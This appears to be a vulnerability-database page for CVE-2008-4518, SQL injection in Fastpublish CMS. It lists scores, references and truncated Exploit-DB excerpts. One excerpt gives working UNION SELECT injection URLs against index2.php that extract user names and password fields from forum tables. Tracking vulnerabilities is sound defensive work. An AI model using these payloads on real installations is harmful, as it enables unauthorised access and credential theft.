CVE-2008-4518
published 2008-10-09CVE-2008-4518: Multiple SQL injection vulnerabilities in Fastpublish CMS 1.9.9.9.9 d (1.9999 d) allow remote attackers to execute arbitrary SQL commands via the (1) sprache…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.5th percentile
Multiple SQL injection vulnerabilities in Fastpublish CMS 1.9.9.9.9 d (1.9999 d) allow remote attackers to execute arbitrary SQL commands via the (1) sprache parameter to index2.php and the (2) artikel parameter to index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fastpublish | fastpublish_cms | — | — |
| fastpublish | fastpublish_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SharePoint 2007 - Team Services Source Code Disclosure
exploitdb·2009-10-26
CVE-2009-3830 SharePoint 2007 - Team Services Source Code Disclosure
SharePoint 2007 - Team Services Source Code Disclosure
---
Summary
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Systems Affected: SharePoint 2007 (12.0.0.6219, 12.0.0.4518 and
possibly others)
Risk: Medium
Status: Reported
TimeLine
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009
Description
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.
It was found that the download facility of Mic
Exploit-DB
Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection
exploitdb·2008-10-05
CVE-2008-4519 Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection
Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection
---
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection
SQL Injection
Exploit 1:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*
Exploit 2:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*
Exploit 3:
http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_
No writeups or analysis indexed.
http://secunia.com/advisories/32126http://securityreason.com/securityalert/4383http://www.securityfocus.com/bid/31582https://exchange.xforce.ibmcloud.com/vulnerabilities/45671https://www.exploit-db.com/exploits/6678http://secunia.com/advisories/32126http://securityreason.com/securityalert/4383http://www.securityfocus.com/bid/31582https://exchange.xforce.ibmcloud.com/vulnerabilities/45671https://www.exploit-db.com/exploits/6678
2008-10-09
Published